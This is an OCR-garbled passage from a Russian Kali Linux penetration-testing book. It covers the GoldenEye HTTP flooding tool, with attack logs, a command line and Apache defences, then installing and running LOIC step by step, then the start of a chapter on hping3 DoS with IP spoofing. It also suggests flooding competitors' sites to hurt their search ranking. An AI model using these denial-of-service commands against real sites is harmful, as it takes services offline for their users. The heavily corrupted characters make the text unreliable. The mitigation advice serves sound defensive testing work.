гТ 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

пгідгаТіоп/О 

10 

гооТ 


Г* 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.15 

ѵѵаІсМод/О 

11 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кНеІрег 

12 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

ЫеѵТтрТв 

13 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

пеТпв 

14 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кНипдІавЫ 

15 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

ѵѵгіТеЬаск 

16 

гооТ 


25 

5 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

квтсі 

17 

гооТ 


39 

19 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кНидерадегі 

18 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

сгурТо 

19 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кіпТедп'ТуЦ 

20 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

Ьі об еТ 

21 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кЫосксІ 

23 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.26 

квѵѵарсІО 

24 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

■р5поТіТу_тагк 

30 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кіНгоТІгі 

31 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

ірѵ6_ас1сігсопТ 

32 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

гіеТегмс) 

66 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

кНиЬгі 

67 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

аІа^вТТ 

68 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

5С5І_еН_0 

69 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

5С5І_ТПГр_0 

70 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

5С5І_еН_1 

71 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.20 

к\ѵогкег/и2 :2 

72 

гооТ 


0 

-20 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

5С5Т_ТтТ_1 

73 

гооТ 


20 

0 

0 

0 

0 

5 

0,0 

0,0 

0:00.00 

5С5І еН 2 

_ 



_ 

__ 



_ 


п Гі 





Тем не менее, сервер не удалось полностью положить при атаке в один поток (хотя 
вообще-то, такая задача и не ставилась). 

Анализ атаки СоМепЕуе 

Посмотрим лог сервера: 


іі 

саТ /ѵаг/Іо§/арасІпе2/ассе55.Іо§ | §гер-Е'192.168.1.55' 

Я использую §гер -Е '192.168.1.55', чтобы отфильтровать подключения только с 
машины, с которой велась атака. 

Видим там примерно такое: 

1| 

192.168.1.55 -- [18/1ип/2015:17:06:51 +0700] "СЕТ 

/іп1 : о.рІір?ѵу550х=1:С1гт1 : Х4НЬѴХВт&СКѴиѵѴ=]ЕоК&пНс8х=0х5ѴКаі:ѵН50Н\Л/568 

НТТР/1.1" 200 69504 "Мо2ІІІа/5.0 (Масіпіюзіі; Іпіеі Мае 05 X 10_3_3) 

АррІе\А/еЬКМ:/535.6 (КНТМЦ Ііке Сеско) Ѵегзіоп/6.0.5 $а1агі/535.17" 
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21 

192.168.1.55 - - [18/.І ип/2015:17:06:48 +0700] "СЕТ 

/іп1о.рНр?сІС1РуХрѵѵ=НВ6ОІі&г]стА=ѴѴА&ѴиШХи0о25=2рЕѴ7пІр&5]уроР=ѵѵІІІх8Ар&1:Хкг 
НВ\л/=1_5§Е0 НТТР/1.1" 200 69504 "Ы:1:р://\л/\л/ѵѵ.Ьаіс)и.сот/к1ІкМХѵ" "Мо2ІІІа/5.0 
(М асі пТозИ; Іпіеі Мае 05 X 11_0_4) АррІе\Л/еЬКі1:/536. 12 (КНТМЦ Ііке Оеско) 
СРіготе/10.0.623.89 53^0/536.26" 

3| 

192.168.1.55 -- [18/.1ип/2015:17:06:51 +0700] "ОЕТ 

/іп1 : о.рІір?0Мк7р=к5< : &1еѴР8РМу=ІІр01:хр0т]Е2РЬх6&ІР5=53Т0АІІІ6Хи&5ЕЬНѴ=5Сѵ1уВд8О 
6Ѵ&ШЬАкОдрк=НІІЕОВ05ОІ\ІЬАМхѴІ\Л/РІхаі НТТР/1.1" 200 69504 "Мо2ІІІа/5.0 
(ѴѴІпсІоѵѵз ЫТ 5.1; ѴѴОѴѴ64) Сеско/20021304 РігеІох/12.0" 

4| 

192.168.1.55 -- [18/.1ііп/2015:17:06:51 +0700] "ОЕТ /іп1 : о.рНр?5АОМІх5РІ=Ѵ\Л/ОЕР]Зр8МО 
НТТР/1.1" 200 69504 

"Іі11р://ѵѵѵѵѵѵ.§оо§Іе.сот/§СрМк2О05?0хОе=67§ѴѴ4НІІсІЗІТКСи2рѴѴ5]&п§ѴѴНМт51=5Хуо 
ОІі6р25ѴІуНВсІК&Ы185В=ап\л/Катпи2хК&ВрІ=НАОѵѵМехІІу1:с&ііОрІ-Ѵ=6ТМЬОеррЬпг&ии21 : ] 
1:Е63=и5ІпА701па4сѴУН0уМ&ТОѴ066ХТ=З^ОІіт1:ХВуСо46НпЬХѴ1" "Мо2ІІІа/5.0 (Ыпих 
х86_64; XII) 0еско/20010905 Ріге1т/17.0" 

51 

192.168.1.55 -- [18/.1ип/2015:17:06:51 +0700] "ОЕТ 

/іп1Ъ.рНр?]А5К\/ѵ=1л/ѵ15М1аРО8Х1СаК&У0тЬ015Хс]=8^5ЬрШхРС=1р\/ѵВНѵМ0у7§І 

НТТР/1-1" 200 69504 "Мо2ІІІа/5.0 (ѴѴІпсІоѵѵз ИТ 5.1; ѴѴОѴѴ64) Сеско/20011709 
РігеРох/23.0" 

6| 

192.168.1.55 -- [18/.1ип/2015:17:06:51 +0700] "ОЕТ 

/іпЬ.рНр?12иОаУ]хт=р21п4ВАКВ1&рхІ1=сТѵѵ&Х]ОРрО=ѴѴЗААѴѴѵеЬЬѴѴ НТТР/1.1" 200 
69504 "Ьі1р://ѵѵѵѵѵѵ.ЬаісІи.сот/ЬОпо571ІІ_АѴ" "Мо2ІІІа/5.0 (ѴѴІпсІоѵѵз N1.6.2; \Л/іп64; х64) 
АррІе\А/еЬКМ:/536.10 (КНТМЦ Ііке Оеско) СНготе/18.0.1844.44 5аШІЬ?,7.21" 

71 

192.168.1.55 -- [18/.1ііп/2015:17:06:51 +0700] "ОЕТ 

/іп1 : о.рНр?пкІкор=6ріѵІС]МЬ6&ІІЗѴ=сЮІЬОпѴѴ31 : еТЕХСт&аН2Л-МІ=50ткре5І-пТ1:ХаІі57а§і& 
8Іі1:]В55=0РиХсЕШ505Ри7с НТТР/1.1" 200 69504 "МогіІІа/5.0 (сотраОЫе; М5ІЕ 10.0; 
МасіпІозРі; .ИЕТ СШ 3.0.8867; ІпТеІ Мае 05 X 11_6_2)" 

8| 

192.168.1.55 - - [18/] и п/2015:17:06:48 +0700] "ОЕТ 

/іп1чэ.рНр?р6Р23Н]=ІсѴ§а5ІІІоѴТаптРЮап&ѴѴѴѴтІ82гЗО=ТСѴ8іТ:а5ѴгѵѵѴ5итгМ НТТР/1.1" 
200 69504 

"Ы:1:р://\л/\л/\л/.ЬаісІи.сот/Т\Л/аВ\л/ІІ К?аМР85Ме5\Л/ѵ=ѴЫ6ѵ32д1:\л/у]&6СЕ\л/ЕВесІ=ЕЬ73УТА24о 
УХтІ.к2ѵѵ&ІІуЗѵѵѵ=4рѵМН8у&.ІѵіГ5=Ри4І'іКШа&НуІѴ1:8§1:Р=СН]т80]аОР2сІ]о05&гт7ЬН=гиІсІ 
4726В1403ХОхО\ллІ6&О.ВкООЗ=ЗЗррРхѴМЗіРі76Ма5§пТ&57§0=ЗѴѴгХЗѴсі&Ѵ$Іі=А13сІ" 
"Мо2ІІІа/5.0 (МасіпЮзН; ІпТеІ Мае 05 X 10_4_1) АррІеѴѴеЬКіі/536.10 (КНТМЦ Ііке Оеско) 

СІіготе/15.0.1172.45 5а1агі/535.15" 

91 

192.168.1.55 -- [18/1ип/2015:17:06:51 +0700] "ОЕТ 

/іп1 : о.рНр?5о640=20ІіоНОаРу&05тхѵѵЕ\А/к=1:УхѴ&у1С7тМ=кОЬихсо5оЛ : ЕРосОи&кЫі:к4ВІ 
І=ЦѴІпгЕ§еІтТЕУОиІсІТР НТТР/1.1" 200 69504 

"Іі1:1:р://192.168.1.37/ихНрѵі6ЕпН?сАугВ]ѵКс=О55Оир5&ггІІ-0=2ЬКР1 : 5уТГ "МогіІІа/5.0 
(ѴѴІпсІоѵѵз; 11; М5ІЕ 10.0; ѴѴІпсІоѵѵз N15.1; .ЫЕТ СІ_К 2.2.16303; \Л/іп64; х64)" 

101 

192.168.1.55 -- [18/1ип/2015:17:06:51 +0700] "ОЕТ 

/іп1 : о.рІір?ЕХВЬеОЗѵѵр=1 : ЕВѴ5ех]іксг8оМЬЕктМ&ѵр§8ѵѵѴХѵ=ОМОрѴР1КМВІІ§І5]Ьѵ4§&55рг\І 
=1Ѵ78ѴѴѵ0иЗѵѴѴ76аоѴѴ4еІМ&1ѴѴЕРтІѴРІІ=уРуВЕк7 НТТР/1.1" 200 69504 "Мо2ІІІа/5.0 
(ѴѴІпсІоѵѵз; 0; М5ІЕ 8.0; Ыпих х86_64; .ИЕТ СІ_Р 1.0.1395; XII)" 

111 

192.168.1.55 -- [18/1ип/2015:17:06:51 +0700] "ОЕТ 

/іп1 : о.рНр?7хІВсІРО=8гпІуасМ&кЕсІ2МѵѵѴ1:]=ЬѴѴІгІѵАНЗА1Н&хѴѴе7ѵрбпН=І : аОІЗРО.І4хАІ : &сІ5п 
І5СѴѴ=ѵѵОВРт<ЕЬМгЕѴѴсІтМРѵоѵ&хѴѴРІ_35ѴЬ=ѴѴМОуѴРХи НТТР/1.1" 200 69504 
"Мо2ІІІа/5.0 (МасіпЮзЬ; ІпТеІ Мае 05 X 10_5_0) Оеско/20062612 Ріге1ох/18.0" 
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121 

192.168.1.55 -- [18/.1ип/2015:17:06:51 +0700] "СЕТ /іп1 : о.рІір?ІѴп80у605=ЮВЬ0тоЮуПВи 
НТТР/1.1" 200 69504 "Мо2ІІІа/5.0 (МасіпЮзЬ; Іпіеі Мае 05 X 11_0_4) Сеско/20052008 
РігеРох/18.0" 

131 

192.168.1.55 -- [18/1ип/2015:17:0б:52 +0700] "ОЕТ 
/іп1Ъ.рІір?тАіЫ:1 : І=с4Ос]АорѴуООА5.ІАІ0ХІІН НТТР/1.1" 200 69504 
" Ы;1;р://\л/\л/\л/.уапсІех.сот/]ЬОЗРІпТіріі?Т\Л/4ѴтѴІр=6А6Т8рухІРІк6" "Мо2ІІІа/5.0 (Ыпих І386; 
XII) АррІе\Л/еЬКі1:/536.27 (КНТМЦ Ііке Оеско) Ѵегзіоп/4.1.4 5ЭІЖІ/537.21" 

141 

192.168.1.55 - - [18/.І и п/2015:17:06:51 +0700] "ОЕТ /іпРо.рІір?1п\/ѵ$7г=ё6ррѴсГОге 

НТТР/1.1" 200 69504 "Мо2ІІІа/5.0 (Ыпих І386; XII) Сеско/20053002 РігеРох/15.0" 

151 

192.168.1.55 - - [18/.І и п/2015:17:06:51 +0700] "ОЕТ 

/іп1 : о.рІір?ООІН1 : І2=СОІіиееІіхЗОрВ320&МпРМІсріТІ\І=НсІВ&ОР§РаО=ІЛ- НТТР/1.1" 200 

69504 "Мо2ІІІа/5.0 (МасіпТозИ; Іпіеі Мае ОБ X 10_3_3) АррІеѴѴеЬКіі/535.29 (КНТМЦ 

Ііке Оеско) СІіготе/19.0.1233.51 5аРагі/536.18" 

161 

192.168.1.55 - - [18/] и п/2015:17:06:51 +0700] "ОЕТ /іпТо.рИр?МІ1к=0РѴ\Л/0Р7 НТТР/1.1" 

200 69504 "МогіІІа/5.0 (Ыпих І386; XII) АррІеѴѴеЬКІ1:/537.1 (КНТМЦ Ііке Оеско) 
СРіготе/8.0.1320.86 5а1агі/535.21" 

171 

192.168.1.55 -- [18/1ип/2015:17:06:51 +0700] "ОЕТ 

/іпРо.рбр?кІіип=хпКрО§Х]ІРШ8ТреХЕР5=28\Л/&\л/РкВ=спОРТ§\лЮрРеС&12спРТ6Ь=ХІ\Ю5Х 
РРсІТга05РІ&0Ррі§Ап62=КІ4У7р]2е7І]ОпОоОN НТТР/1.1" 200 69504 "Мо2ІІІа/5.0 
(\Д/І псіоѵѵб ІЧТ.6.2; ѴѴІп64; х64) АррІеѴѴеЬКіі/537.3 (КНТМЦ Ііке Оеско) Ѵегзіоп/5.1.2 
5аРагі/536.32" 



(Изображение можно увеличить, нажмите на него) 


Одного взгляда на логи достаточно, что каждый запрос ОЕТ содержит различные 
строки, различные пользовательские агенты и различных реферов, среди которых Віп§, 
Ваісіи, Ѵапбех и другие рандомные поисковые системы. 


Так что происходит, когда ваш веб-сервер встречается с этой атакой? Он анализирует 
входящий трафик, проверяет запрашиваемые ІЖЦ адреса источников и поле Веі'еггег и 
пропускает их с кодом 200 ОК. Почему? Потому что каждый браузер был различным. 
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Инструмент был создан остроумно так, чтобы любой сервер мог подумать, что это 
различные пользователи, пытающие зайти с одного ІР (может быть ІР прокси или 
большой организации?) с различными браузерами (Рігеіох, СНгогпе, М5ІЕ, 5а^а гі и т. д.), 
различными операционными системами (Мае, Ыпих, \Л/іпсІоѵѵ5 и т.д.) и даже с 
различными реферами. Да, возможно запрашиваемый ІІРІ. был неправильным, но 
нормальные веб-сервера всё равно пропустят его, перенаправят на страницу ошибки в 
то время как соединение будет оставаться открытым (например, АрасЬе ѵѵогкег/зоскеі). 
Стандартный веб-сервер обычно позволяет X число одновременных пользователей с 
одного ІР и с большим количеством соединений/используемых сокетов, этот тип атаке 
приводит к тяжёлому давлению на сервер и последующие пользователи получают 
ошибку (НИР 503 или наподобии). Следовательно, атакующий с несколькими 
рандомными ргоху/ѴРІ\І может быстро истощить ресурсы сервера. Он даже может 
замедлить атаки на один ІР для избежания начального выявления: 


гоо1@каІІ:~/СоІсІепЕуе/СоІсІепЕуе-та5І:ег# ./§оІсіепеуе.ру 
Іі11р://ѵѵѵѵѵѵ.§оІ(1епеуе1е5І5І1е.сот/ -ѵѵ 10 -5 10 -т гапсіот 


Вышеприведённая команда использует: 


-ѵѵ = 10 одновременные рабочие 


-5 = 10 одновременных соединений 


-т = рандом, смесь ОЕТ и Р05Т 
Совершенный 0о5! 


Интересное наблюдение по Соо^Іе Апаіуіісз и СоІсІепЕуе 

Я попробовал это в живую, чтобы просто посмотреть, как поведёт себя реальный веб¬ 
сервер. Интересно, оказывается что Соо§1е Апаіуіісз воспринимает этот трафик как 
реальный и добавляет данные от флуда в статистику (хотя он и идёт с одного ІР, но 
различные рефереры и браузеры убеждают Соо§1е в том, что это отдельные 
пользователи). Можно придумать ещё пару способов эксплуатировать это: 

• Можно повышать свой рейтинг в Соо§1е, т. к. она будет воспринимать это как 
легитимный трафик. 

• Если Соо§1е будет наказывать за это, то тогда можно зафлудить веб-сайты 
конкурентов для понижения их ранжирования в Соо§1е. 


Эта палка о двух концах. 

Блокирование/защита от атаки СоІсІепЕуе 

Следующие предложения хорошо сработают, когда вы используете АрасНе: 

1. Понижение соединений на один ІР (обычно их 300 на ІР для Арасбе) 

2. Редактирование порога соединений на ІР 

3. Отключить настройки КеерАІіѵе и нижний Соппесііоп Тітеоиі (по умолчанию это 
300) 

4. Если вы хоститесь на общем сервере, обратитесь к сисадминам. Если они не 
могут защитить от этой простой атаки, то просто переезжайте к хостинг 
компании получше . 

5. Используйте ѴѴеЬ арріісаііоп РігеѵѵаІІ (ѴѴАР). 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


194 










Тестирование на проникновение с помощью КаМ Ыпих 2.0 


6. Использование белых листов для входящих запросов — и эта атака не окажет 
эффекта на ваш сервер. 

7. ІЧСІІЧХ и ІМосІе.із вроде бы лучше справляются с атаками подобного рода. 

Заключение 

СоИепЕуе выглядит как расширенная (или схожая на) НИР РІообег программа. Обе 
работают похожим образом, но ІМоСасЬе и КеерАІіѵе от ОоИепЕуе делают большую 
разницу. Также она использует интересный способ перемешивания браузеров, 
операционных систем и рефереров, что может обмануть файервол. 

В общем, это хороший инструмент для тестирования на нагрузку своего собственного 
веб-сайта (с разрешения вашей хостинг компании), вашего корпоративного веб-сайта и 
любых веб-приложений, которые позволяют входящие СЕТ или Р05Т запросы. 
Используйте её для обновления ваших правил файервола. ѴѴАР и благодаря 
этому избежите будущих атак. 


Глава 31. Стресс-тест сети с І_оѵ\/ ОгЬіІ Іоп Саппоп (ЮІС) 

Что такое Ьоѵѵ ОгЬіІ Іоп Саппоп (ЮІС) 

І_о\л/ ОгЬіІ: Іоп Саппоп (ЮІС) — это инструмент стресс-теста сети, это значит, что он 
создан для проверки, как много трафика цель может обработать. Чтобы основываясь 
на этих данных сделать оценку запаса мощности ресурсов. Эта программа вдохновила 
создание других подобных программ, у неё существует множество клонов, некоторые 
из которых позволяют проводить стресс-тест прямо из браузера. 

Эта программа с успехом использовалась группой Апопутоиз, для облегчения их ОйоЗ 
атак против нескольких веб-сайтов, в том числе некоторых очень известных 
общественных организаций. Противники запрета этой программы указывают, что то, 
что она делает, аналогично заходу на веб-сайт несколько тысяч раз; тем не менее, 
некоторые американские правоохранительные группы расценивают использование 
ЮІС как нарушение компьютерной безопасности и мошенническое действие. 

Установка Іо\м ОгЬіІ Іоп Саппоп (ЮІС) на \Л/іпсІоѵѵ5 

Для пользователей ѴѴіпсІоѵѵз всё совсем просто — зайдите на сайт и скачайте архив. 
Распакуйте из архива один единственный файл и запустите его. Всё готово! 
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Установка Ьоѵѵ ОгЬіІ Іоп Саппоп (ЮІС) на Ыпих 

Установить ЮІС можно на любой Ыпих, ниже, в качестве примера, выбрана установка 

на Каіі Ыпих . 

Для установки ЮІС откройте окно терминала и наберите там: 


1| 

ар1-§е1: ирсіаіе 

2 1 

арбіисіе іпзіаіі §і1:-соге топосіеѵеіор 

3| 

ар!-§е1: іпзбаі 1 топо-§тс5 


гооІ@каІі-тіаІ: “ 

Файл Правка Вид Поиск Терминал Справка 


(зТгопд-пате-Тоо!) в автоматический режим 
Настраивается пакет топосіеѵеіор (3.0.3.2+сІГзд-І) ... 

Обрабатываются триггеры для тепи ... 

п:іпТ(ок,тІі-ті<тІ арТ-деТ іпзТаИ топо-дтсз 
Чтение списков пакетов... Готово 
Построение дерева зависимостей 
Чтение информации о состоянии... Готово 
НОВЫЕ пакеты, которые будут установлены: 
топо-дтсз 

обновлено 0, установлено 1 новых пакетов, для удаления отмечено 0 пакетов, и 1 п 
акетов не обновлено. 

Необходимо скачать 429 кВ архивов. 

После данной операции, объём занятого дискового пространства возрастёт на 1 207 
кВ. 

Получено:1 ИТТр ://б11р .каіі.огд/каіі/ каіі/таіп топо-дтсз аіі 2.10.8.1-8 [429 кВ 

3 

Получено 429 кВ за 24с (17,3 кБ/с) 

Выбор ранее не выбранного пакета топо-дтсз. 

(Чтение базы данных ... на данный момент установлено 328273 файла и каталога.) 
Распаковывается пакет топо-дтсз (из файла .../топо-дтсз_2.10.8.1-8_а11 .сІеЬ) ... 
Обрабатываются триггеры для тап-сІЬ ... 

Настраивается пакет топо-дтсз (2.10.8.1-8) ... 

| 



Если вы, как и я, устанавливаете на Каіі Ыпих, то следующий шаг пропускаете. Если же у 
вас ІІЬипІи, Ыпих Міпі (возможно нужно и для ОеЬіап), то выполните следующую 
команду: 


1| 

5ис1о ар!-§е1: іпзбаІІ топо-сотріеіе 

Когда всё завершилось, идём в каталог рабочего стола, используя: 

1| 

ссі ./Резкіор 

И создаём там папку с названием Іоіс, используя следующую команду: 

1| 

тксііг Іоіс 


гоо1:@каІі-іпіаІ :~/Ре5к1:ор# рмсі 
/гооІі/ОезкІіор 

о1@каІі-іпіаІ :~/0е5к1:ор# тксііг Іоіс 
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Переходим туда, используя: 


1| 

ссі ./Іоіс 

И печатаем там следующую команду: 

1| 

\л/§е! Ні1рз://га\л/.§і1:НиЬ.сот/пісоІаг§о/Іоісіп5І:аІІег/та5І:ег/Іоіс.5Н 


Файл Правка Вид Поиск Терминал Справка 


:-Л)е 5 кТор/Іоіс# мдеі Ніірз://гам.ді 1 :НиЬ.сот/пісоІагдо/ІоісіпзіаП 
ег/тазіег/іоіс.зН 

- -2015-01 -07 11:39:04-- Ніірз ://гам.дііНиЬ .сот/пісо 1 агдо/ 1 оісіпз 1 :аП.ег/та 5 І:ег /1 
оіс.зН 

Распознаётся гам.дііНиЬ.сот (гам.дііНиЬ .сот) ... 103.245.222.133 
Подключение к гам.дііНиЬ .сот (гам.дііНиЬ .сот) 1103.245.222.1331 :443. . . соединение 
установлено. 

НТТР-запрос отправлен. Ожидание ответа... 301 МоѵесІ Регтапепііу 

Адрес : Ніірз ://гам.ді1:НиЬизегсоп1:еп1: .сот/пісоіагдо/іоісіпзіаііег/тазіег/'іоіс .зН 

[переход] 

- -2015-01 -07 11:39:10-- Ніірз ://га\ѵ.діТЬиЬизегсопТеп'І: .сот/пісоІагдо/ІоісіпзіаП. 
ег/тазіег/іоіс.зН 

Распознаётся гам.дііНиЬизегсопіепі .сот ( гам.дііНиЬизегсопіепІ: .сот) . . . 103.245.22 
2.133 

Подключение к гам.дііНиЬизегсопіепТ: .сот ( гам. дііНиЬизегсопіепІ: .сот) 1103.245.222. 
133|:443... соединение установлено. 

НТТР-запрос отправлен. Ожидание ответа... 200 ОК 
Длина: 2331 (2,ЗК) [іехі/ріаіп] 

Сохранение в каталог: ««Іоіс.зН»». 

1 Ѳ 0 % [======================================>] 2 331 --.-К/з за 0з 

2015-01-07 11:39:12 (42,7 МВ/з) - «Іоіс.зН» заѵесі [2331/2331] 

гоо1(дка1і-ті.. :~/РезкТор/Іоіс# [~|_ 


Далее дадим разрешения файлу скрипта на исполнение: 


1| 

сНтосІ 777 Іоіс.зН 

Ну и последним шагом запустим скрипт следующей командой: 

1| 

./Іоіс.зН іпзіаі 1 

Если вы не видите от скрипта каких-либо сообщений об ошибках, значит вы уже готовы 
обновить Іоіс. Чтобы сделать это, выполните следующую команду: 

1| 

./Іоіс.зН ирсіаіе 

Ну и совсем уже последнее, запускаем ЮІС. Вы можете это сделать следующей 
командой: 

1| 

./Іоіс.зН гип 
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гоо*@каІі-тіаІ: "/Оезк^ор/Іоіс 

Файл Правка Вид Поиск Терминал Справка 


"/гез :/гооі/Оезкіор/Іоіс/І_ОІС/ігтМаіп. гезоигсез,І_ОІС . ігтМаіп . гезоигсез" 
"/гез :/гооі/Оезкіор/Іоіс/І_ОІС/ігтѴ\П:і . гезоигсез, І.0ІС . Т гпМі Т . гезоигсез" 

"/гез :/гооі/Оезкіор/Іоіс/І_ОІС/Р горе гііез/Везоигсез .гезоигсез, ЮІС.Ргорегіі 
ез. Резой гс ез.гезои гс ез " 

"/гооі/Оезкіор/Іоіс/ЮІС/Ргорегііез/Везоигсез .Оезідпег.сз" 
"/гооі/Оезкіор/Іоіс/ЮІС/ХХРРІоосІег.сз" 

Сотрііаііоп зиссеесіесі - 1 \л/агпіпд(з) 

/гооі/Оезкіор/Іоіс/ЮІС/ігтМаіп.сз( 180,59) : магпіпд С5Ѳ219: ТИе ѵагіаЬІе 
'ірНозі' із аззідпесі Ьиі ііз ѵаіие із пеѵег изесі 


Построение завершено -- 0 ошибок, 1 предупреждение 
гооіфкаіі-іпіаі :~/Оезкіор/Іоіс# ./Іоіс.зіі ирйаіе 
/изг/Ьіп/діі 

Сиггепі ЬгапсИ тазіег із ир іо сіаіе. 

/изг/Ьіп/діі 
МопоОеѵеІор Виіісі Тооі 

Загружается решение: /гооі/Оезкіор/Іоіс/ЮІС/ЮІС.зіп 
Загружается решение: /гооі/Оезкіор/Іоіс/ЮІС/ЮІС .зіп 
І_оасІіпд рго)есіз .. 

гооі(акаІі-тіаІ :~/Оезкіор/Іоіс# ./Іоіс.зіі гип 
/изг/Ьіп/топо 

Соиій поі зеі X Іосаіе тосііііегз 

I 


Ьо\л/ ОгЬіі Іоп Саппоп | II сіип доо^есі | ѵ. 1.1.1.26 



0 Мапиа) Мосіе (йо іі ѵоигзеЮ 9 ІРС Мойе (НіѵеМіпсО 

|—1. Зеіесі уоиг іагдеі - 

ІІРІ. | 

ІР 


Рогі СбаппеІ 

6667 тЯоіс 


Оізсоппесіесі. 

I—3. Реайу? - 


I І_оск оп 
I І_оск оп 


ІММА СНАРСІЫ МАН 1_А2ЕР 


<-5еІесіей іагаеі - 

/ 

\І О N Е . 

1 


-2. Апаск оряіопз 


ТСР / ІГОР теззаде 
II йип дооіей 
НТТР ЗиЬзііе 
I 

I Аррепй гапйот сЬагз іо іКе зиЬзііе I теззаде 


<= Іазіег 5реей зіом/ег => 

ТСР В 80 10 9001 

МеіЬой РоП ТЬгеайз Тітеоиі 


а ѴѴаіі Іог геріу 
Ц ІІзе С2ІВ (НТТР) 


|— Апаск зіаіиз 
Ійіе 


Соппесііпд 


Редиезііпд 


Ооѵѵпіоайіпд 


РедиезіесІ 


Кстати, помните, что на ѴѴіпсІоѵѵз мы быстрее получили программу (просто скачали 
файл)? А зато на Ыпих версия программы новее! 


Стресс-тест сети с Ьоѵѵ ОгЬіІ Іоп Саппоп (ЮІС) 

Использование ЮІС простое как пробка. Вы можете выбрать ручной или IКС режим. 
Для следующего примера мы выберем ручной режим. Введите ІІКІ. или ІР адрес. Мы 
введём адрес сайта. Нажмите І_оск оп. Нужно выбрать метод атаки: ТСР, ІЮР или НТТР. 
Мы выберем НТТР. Остальные настройки можно не менять. Когда всё готово, запустите 
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ІРС зегѵег 


9 МапиаІ Мосіе (Ро іі ѵоигзеІО Ш ІРС Мосіе (НіѵеМіпсІ) 


-3. Реагіу? 


]ііРіиЬ .сот/№\л/ЕгаСгаскег/1_01С 


атаку кнопкой ІММА СНАКСІІМ МАН І.А2ЕК. ЮІС покажет процесс атаки. Нажмите на 
кнопку 5Тор ЕІоосІіп§ для остановки атаки: 

1_оѵѵ ОгЬіІ Іоп Саппоп { II сіип дооГес! | ѵ. 1.1.1.26 


Роп СбаппеІ 

6667 «оіс 


Оізсоппесіесі. 


-1. Зеіесі уоиг іагдеі - 
ІЭРІ. ѵѵеЬ\маге.Ьі 2 


Зіор ТІоосІіпд 


-Зеіесіесі іагдеі - 

185.26.122.50 

-2. АПаск орііопз - 

ТСР I ІГОР теззаде 

Іі сіип дооіесі 

НИР ЗиЬзііе 
I 

I Аррепй гапсіот сбагз іо Ніе зиЬзііе I теззаде 


-Апаск зіализ - 

Ісііе 

Соппесііпд 

Редиезііпд 

Ооѵѵпіоасііпд 

Ооѵѵпіоасіесі 

Редиезіесі 

Раііесі 

0 

3 

0 

35 

532 

567 

1271 



п.с. я изучил логи сервера, заметна значительная разница между версиями 
для \Л/іпсІо\л/5 и Ыпих. Надо думать, что там не только добавили свистоперделки вроде 
ІРС режима, но и изменили алгоритмы самих атак. Также интересна новая опция по 
подстановки случайных значений в качестве поддерикторий. 


Глава 32. Стресс-тест сети: Ро$ с использованием Нріп§3 и 
спуфингом ІР в Каіі Ыпих 

В компьютерной терминологии атака отказ-в-обслуживании (0о5) или атака 
распределённый отказ-в-обслуживании (00о5) — это попытка сделать ресурсы 
машины или сети недоступными для пользователей. Хотя средства, мотивы и цели 0о5 
различаются, главная её суть остаётся прежней — на время или на неопределённый 
срок прервать или приостановить услугу хоста, соединённого с Интернетом. В этой 
статье я покажу, как выполнить атаку 0о5 атаку с использованием Нріп§3 и спуфингом 
ІР в Каіі Ыпих. 

Как известно, 00о5 — это атака, осуществляемая двумя или более лицами, или ботами, 
а ЭоЗ атака делается одним лицом или системой. На 2014 год, частота распознанных 
00о5 атак достигла в среднем 28 за каждый час. 

Обычной целью исполнителей 0о5 атак являются сайты и услуги на привлекающих 
внимания серверах, вроде банковских, платёжные шлюзы кредитных карт и даже 
корневые сервера имён. Угроза отказа-в-обслуживании также распространены в 
бизнесе в отношении веб-сайтов. 

Эта техника теперь широко применяется в определённых играх, используемая 
владельцами серверов или недовольными конкурентами в таких играх как популярные 
сервера Міпесгаіі. Возрастает применение 0о5 как формы «Уличных Интернет 
Протестов». Этот термин обычно применяется к компьютерным сетям, но не 
ограничивается этим; например, он также относится к управлению ресурсами СРІІ. 

Понятно, что тема эта актуальная. Поэтому важно подготовится к атакам подобного 
рода. Провести стресс-тесты своих сетей и серверов. Если они проседают под натиском 
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0о5, то обратитесь к инструкциям по настройке тосі еѵазіѵе и тосі-доз . А данная статья 
и другие по стресс-тесту сети помогут вам протестировать работоспособность этих 
модулей на ваших серверах. 

Один из общих методов атаки — это насыщение целевой машины внешними 
запросами связи, в связи с чем она не может ответить на легитимный трафик или 
отвечает так медленно, что является по существу недоступной. Такие атаки обычно 
ведут к перегрузке сервера. Обобщённо говоря, в результате ЭоЗ атаки оказываются 
занятыми те или иные ресурсы сервера и он больше не может выполнять деятельность, 
для которой он предназначен, либо происходит воспрепятствование связи между 
пользователями и жертвой таким образом, что они больше не могут адекватно 
обмениваться информацией. 

йоЗ атаки незаконны. Их организаторы и рядовые исполнители преследуются по 
законам многих стран. Стресс-тест собственной сети не является противозаконным. 
Стресс-тест чужих сетей/серверов при получении их согласия также разрешён, но 
